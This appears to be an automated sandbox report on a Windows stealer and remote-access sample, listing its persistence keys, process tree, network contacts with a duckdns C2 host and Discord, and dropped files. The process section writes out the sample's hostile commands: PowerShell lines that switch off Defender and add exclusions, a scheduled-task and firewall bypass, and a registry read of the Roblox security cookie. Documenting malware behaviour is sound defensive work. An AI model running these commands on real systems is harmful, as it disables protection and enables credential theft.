Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Server.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\Server.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\6a8a3b6e5450a823d542e748a454aa4c = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\server.exe\" .." C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1900 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 1900 wrote to memory of 4548 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\Server.exe
PID 1900 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 1900 wrote to memory of 3984 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\3.exe
PID 1900 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 1900 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe C:\Users\Admin\AppData\Local\Temp\msxml6.EXE
PID 3984 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3984 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4548 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 4548 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 4548 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\Server.exe
PID 3984 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 3984 wrote to memory of 1792 N/A C:\Users\Admin\AppData\Local\Temp\3.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 4548 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 4548 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\Server.exe C:\Users\Admin\AppData\Roaming\conhost.exe
PID 4308 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\SYSTEM32\attrib.exe
PID 4308 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\SYSTEM32\attrib.exe
PID 4308 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 1224 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 4288 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 532 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 532 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 836 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\schtasks.exe
PID 836 wrote to memory of 4376 N/A C:\Users\Admin\AppData\Roaming\conhost.exe C:\Windows\System32\schtasks.exe
PID 4308 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 1188 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4244 wrote to memory of 736 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 4244 wrote to memory of 736 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 4244 wrote to memory of 736 N/A C:\Users\Admin\AppData\Roaming\Server.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 4308 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 4148 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 4312 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 3700 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4308 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 3424 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\System32\Wbem\wmic.exe
PID 4308 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\SYSTEM32\cmd.exe
PID 4308 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Roaming\3.exe C:\Windows\SYSTEM32\cmd.exe
PID 2044 wrote to memory of 4768 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 2044 wrote to memory of 4768 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 736 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 736 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 736 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe

"C:\Users\Admin\AppData\Local\Temp\64787cd5380092f4842918dde01f0bfe92c133a925cdaef9f7289e6e53af4eed.exe"

C:\Users\Admin\AppData\Local\Temp\Server.exe

"C:\Users\Admin\AppData\Local\Temp\Server.exe"

C:\Users\Admin\AppData\Local\Temp\3.exe

"C:\Users\Admin\AppData\Local\Temp\3.exe"

C:\Users\Admin\AppData\Local\Temp\msxml6.EXE

"C:\Users\Admin\AppData\Local\Temp\msxml6.EXE"

C:\Users\Admin\AppData\Roaming\3.exe

"C:\Users\Admin\AppData\Roaming\3.exe"

C:\Users\Admin\AppData\Roaming\Server.exe

"C:\Users\Admin\AppData\Roaming\Server.exe"

C:\Users\Admin\AppData\Roaming\conhost.exe

"C:\Users\Admin\AppData\Roaming\conhost.exe"

C:\Users\Admin\AppData\Roaming\conhost.exe

"C:\Users\Admin\AppData\Roaming\conhost.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\3.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\3.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'conhost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Ondrive.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ondrive.exe'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Ondrive" /tr "C:\Users\Admin\AppData\Roaming\Ondrive.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\3.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

C:\Users\Admin\AppData\Roaming\Ondrive.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.187.195:443 gstatic.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 195.187.250.142.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.138.232:443 discord.com tcp
US 8.8.8.8:53 232.138.159.162.in-addr.arpa udp
US 8.8.8.8:53 testarosa.duckdns.org udp
DE 158.255.214.24:7110 testarosa.duckdns.org tcp
US 147.185.221.20:49236 N/A tcp
US 8.8.8.8:53 24.214.255.158.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 147.185.221.20:49236 N/A tcp
US 147.185.221.20:49236 N/A tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 147.185.221.20:49236 N/A tcp
US 147.185.221.20:49236 N/A tcp
US 147.185.221.20:49236 N/A tcp
US 8.8.8.8:53 200.201.50.20.in-addr.arpa udp

Files

memory/1900-0-0x00007FFB7C0C3000-0x00007FFB7C0C5000-memory.dmp

memory/1900-1-0x0000000000E70000-0x0000000001630000-memory.dmp

memory/1900-2-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Server.exe

C:\Users\Admin\AppData\Local\Temp\3.exe

memory/4548-24-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/4548-26-0x0000000000C20000-0x0000000000C38000-memory.dmp

memory/3984-29-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/3984-28-0x0000000000D50000-0x0000000000D9A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Server.exe

C:\Users\Admin\AppData\Roaming\conhost.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Local\Temp\msxml6.EXE

memory/4308-70-0x000001EC18680000-0x000001EC186C0000-memory.dmp

memory/836-84-0x00000000002D0000-0x00000000002E0000-memory.dmp

memory/4548-83-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/3984-82-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/1900-81-0x00007FFB7C0C0000-0x00007FFB7CB81000-memory.dmp

memory/1536-91-0x0000021E74020000-0x0000021E74042000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bglhk2tl.fog.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

memory/4308-111-0x000001EC1A3F0000-0x000001EC1A466000-memory.dmp

memory/4308-117-0x000001EC1A320000-0x000001EC1A370000-memory.dmp

memory/4308-122-0x000001EC18B40000-0x000001EC18B5E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

memory/4308-171-0x000001EC1A380000-0x000001EC1A38A000-memory.dmp

memory/4308-172-0x000001EC1A3B0000-0x000001EC1A3C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\3.exe.log